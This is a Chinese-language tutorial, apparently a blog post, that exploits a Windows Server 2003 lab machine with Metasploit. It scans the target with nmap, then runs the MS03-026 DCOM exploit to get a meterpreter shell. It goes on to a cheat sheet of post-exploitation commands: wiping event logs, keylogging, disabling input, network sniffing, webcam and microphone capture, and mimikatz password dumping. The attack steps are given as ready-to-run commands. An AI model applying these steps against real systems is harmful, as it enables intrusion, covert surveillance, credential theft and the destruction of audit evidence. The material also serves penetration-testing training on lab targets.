Kali之msf简单的漏洞利用
0X01 信息收集
靶机的IP地址为:192.168.173.136
利用nmap工具扫描其开放端口、系统等
整理一下目标系统的相关信息
系统版本:Windows server 2003
开放的端口及服务:
21/tcp ftp
135/tcp msrpc
139/tcp netbios-ssn
445/tcp microsoft-ds
777/tcp multiling-http
1025/tcp NFS-or-IIS
1026/tcp LSA-or-nterm
1029/tcp ms-lsa
1030/tcp iad1
6002/tcp X11:2
7001/tcp afs3-callback
7002/tcp afs3-prserver
8099/tcp 未知服务
0X02 漏洞分析
从扫描出的端口发现,目标主机开启了135端口,服务为msrpc(远程过程调用服务),即Windows的RPC服务。
针对这个服务,我们就可以尝试去利用一下。
0X03 漏洞利用
kali机打开Metaspolit:
root@kali:~# msfconsole
查找所有跟Windows RPC相关的漏洞攻击:
msf5 > search dcom
使用MS-03-026 进行攻击:
msf5 > use exploit/windows/dcerpc/ms03_026_dcom
为了实施攻击,查看漏洞攻击的选项和条件:
msf5 exploit(windows/dcerpc/ms03_026_dcom) > show options
知道攻击所需要的条件,接下来进行设置,只需要设置我们攻击的目标主机即可:
msf5 exploit(windows/dcerpc/ms03_026_dcom) > set RHOSTS 192.168.174.136
RHOSTS => 192.168.174.136
设置好攻击条件之后,接下来就进行攻击:
msf5 exploit(windows/dcerpc/ms03_026_dcom) > exploit
执行攻击命令之后,我们获取到了目标主机的shell权限,现在,可以执行命令查看目标主机的一些东西,比如网络配置信息:
meterpreter > ipconfig
如需进一步攻击利用,可配合其他命令进一步操作。
0X04 meterpreter下相关命令
基本系统命令
——————————
shell 进入目标主机cmd shell
reboot 重启目标主机
shutdown 关闭目标主机
sysinfo 查看目标主机系统信息
background 将当前会话放置后台
info 查看已有信息模块
run 执行已有的模块,输入run后按tab键补全,会列出已有的脚本
clearav 清除windows中的应用程序日志、系统日志、安全日志
ipconfig 查看网络配置信息
netstat 查看网络连接信息
getproxy 查看代理信息
route 查看路由
arp 查看arp信息
进程列表:
——————————
getuid 获取系统ID以及计算机名称
getpid 获取当前进程标识符
kill 结束进程
ps 列出正在运行中的进程
鼠标/键盘操作
——————————
keyscan_start 开启按键记录会话
keyscan_stop 终止按键记录会话
keyscan_dump 转储从目标主机捕获到的按键记录
uictl enable mouse 启用鼠标
uictl disable mouse 禁用鼠标
uictl enable keyboard 启用键盘
uictl disable keyboard 禁用键盘
会话
——————————
enumdesktops 列举所有可访问到的桌面和工作站
getdesktop 获取当前Meterpreter桌面
setdesktop 变更Meterpreter当前桌面
嗅探功能
——————————
use sniffer 加载嗅探功能
sniffer_interfaces 查看网卡
sniffer_start 开始对网卡执行嗅探
sniffer_stats 查看状态
sniffer_stop 停止对网卡的嗅探
sniffer_dump 将捕获到的目标主机上的数据转储到本地
摄像头命令
——————————
webcam_list 列举系统所有的摄像头
webcam_snap 使用目标主机摄像头拍照
record_mic 从主机的默认麦克风中记录环境声音
webcam_stream 通过摄像头开启视频
远程桌面/截屏
——————————
enumdesktops 查看可用的桌面
getdesktop 获取当前meterpreter 关联的桌面
set_desktop 设置meterpreter关联的桌面 -h查看帮助
screenshot 截屏
use espia 或者使用espia模块截屏 然后输入screengrab
run vnc 使用vnc远程桌面连接
抓取密码
——————————
load mimikatz 查看帮助
wdigest 获取Wdigest密码
mimikatz_command -f samdump::hashes 执行mimikatz原始命令
mimikatz_command -f sekurlsa::searchPasswords
Kali之msf简单的漏洞利用的更多相关文章
- Windows 漏洞利用开发
第一阶段:简单栈溢出 分析栈溢出原理 寻找溢出点,了解pattern_create和pattern_offset计算溢出点的原理 寻找JMP ESP跳板,分析利用JMP ESP跳板劫持程序流的原理 编 ...
- Kali MSF漏洞利用
一.前言 漏洞利用是获得系统控制权限的重要途经.用户从目标系统中找到容易攻击的漏洞,然后利用该漏洞获取权限,从而实现对目标系统的控制. 二.Metasploitable Metasploitable是 ...
- Kali Linux渗透基础知识整理(三):漏洞利用
漏洞利用阶段利用已获得的信息和各种攻击手段实施渗透.网络应用程序漏洞诊断项目的加密通信漏洞诊断是必须执行的.顾名思义,利用漏洞,达到攻击的目的. Metasploit Framework rdeskt ...
- 小白日记48:kali渗透测试之Web渗透-XSS(二)-漏洞利用-键盘记录器,xsser
XSS 原则上:只要XSS漏洞存在,可以编写任何功能的js脚本 [反射型漏洞利用] 键盘记录器:被记录下的数据会发送到攻击者指定的URL地址上 服务器:kali 客户端 启动apache2服务:ser ...
- CVE-2017-11882漏洞利用
CVE-2017-11882漏洞利用 最新Office的CVE-2017-11882的poc刚刚发布出来,让人眼前一亮,完美无弹窗,无视宏,影响Ms offcie全版本,对于企业来说危害很大.在此简单 ...
- Metaploit-永恒之蓝漏洞利用
目录 Metaploit介绍 实验环境 漏洞利用过程 Metaploit介绍 本次测试主要是利用永恒之蓝漏洞对windows7进行控制利用,掌握Metaploit工具的使用,知道永恒之蓝的漏洞利用原理 ...
- office漏洞利用--获取shell
环境: kali系统, windows系统 流程: 在kali系统生成利用文件, kali系统下监听本地端口, windows系统打开doc文件,即可中招 第一种利用方式, 适合测试用: 从git下载 ...
- ms17-010漏洞利用教程
ms17-010 漏洞利用并拿下服务器教程 攻击环境: 攻击机win2003 ip:192.168.150.129 Window2003 Python环境及工具 攻击机kali: ip:192.168 ...
- Struts S2-052漏洞利用之Meterpreter(CVE-2017-9805)
Struts S2-052漏洞爆出来已经快一周了,大家可能更想知道其危害~鸡肋? 这里就直接给出漏洞利用拿Meterpreter的过程,想了解更多的请参考其他文章,下面是实验演示部分.Struts S ...
随机推荐
- Mysterious Antiques in Sackler Museum(判断长方形)
题目链接 参考博客Ritchie丶的博客 - UVALive 7267 Mysterious Antiques in Sackler Museum (判断长方形) 题意:大概意思就是判断四个矩形能不能 ...
- 集合 Enumerable Enumerator yield
集合: 通过索引来访问成员,--引申到索引器 的使用 for foreach循环遍历 --引申到 IEnumerable IEnumerator(会引申到yield) 常用的集合操作,add, ins ...
- TIJ——Chapter Twelve:Error Handling with Exception
Exception guidelines Use exceptions to: Handle problems at the appropriate level.(Avoid catching exc ...
- 2017 ACM-ICPC 亚洲区(乌鲁木齐赛区)网络赛 H Skiing【拓扑排序,关键路径】
2017 ACM-ICPC 亚洲区(乌鲁木齐赛区)网络赛 H Skiing In this winter holiday, Bob has a plan for skiing at the moun ...
- 洛谷 2149 [SDOI2009]Elaxia的路线
题目描述 最近,Elaxia和w的关系特别好,他们很想整天在一起,但是大学的学习太紧张了,他们 必须合理地安排两个人在一起的时间.Elaxia和w每天都要奔波于宿舍和实验室之间,他们 希望在节约时间的 ...
- Vue电商后台管理系统项目第1天-基本环境搭建&登录功能
基本环境搭建完成 安装npm包:npm -S i vue vue-router axios element-ui 配置Eslint: 打开设置,搜索Eslint拓展,然后将下面代码覆盖进去即可 { , ...
- let & const 命令
一.let命令 用于声明变量. 1) 所声明的变量只在let命令所在代码块内有效.(块级作用域) { let a=10; var b=1; } a // ReferenceError: a is no ...
- 【DCN】Wireless Intranet Captive Portal
Wireless Intranet Captive Portal 配置AAA服务Radius认证 radius-server key 0 radius radius-server authentica ...
- iOS设备 微信h5页面回退 内容不刷新的问题
原因分析: 一.android 浏览器 包括微信的开发者工具 都是ok的返回可以刷新页面但是唯有iOS不行. 二.iOS 浏览器原因:history.go(-1)返回上一页后,页面内容并不会刷新.在B ...
- 快速理解bootstrap,bagging,boosting,gradient boost-三个概念
1 booststraping:意思是依靠你自己的资源,称为自助法,它是一种有放回的抽样方法,它是非参数统计中一种重要的估计统计量方差进而进行区间估计的统计方法. 其核心思想和基本步骤如下: (1 ...